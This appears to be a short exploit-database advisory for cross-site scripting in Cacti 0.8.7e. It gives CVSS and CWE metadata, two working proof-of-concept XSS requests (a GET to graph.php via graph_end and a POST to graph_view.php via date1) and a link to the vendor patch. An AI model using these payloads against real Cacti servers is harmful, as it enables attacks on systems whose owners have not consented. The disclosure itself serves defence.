vendor:
Cacti
by:
Moritz Naumann
7.5
CVSS
HIGH
Cross Site Scripting (XSS)
79
CWE
Product Name: Cacti
Affected Version From: 0.8.7e
Affected Version To: 0.8.7e
Patch Exists: YES
Related CWE: N/A
CPE: a:cacti:cacti
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Firefox 3.0.6
2009
Cacti 0.8.7e Multiple Security Issues
A HTTP GET request against the URL http://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27 and a HTTP POST request against http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true with an 'application/x-www-form-urlencoded' content type HTTP body part containing date1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27' can be used to exploit the Cross Site Scripting vulnerability in Cacti 0.8.7e and earlier versions.
Mitigation:
The Cacti group provides a patch to fix this vulnerability: http://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch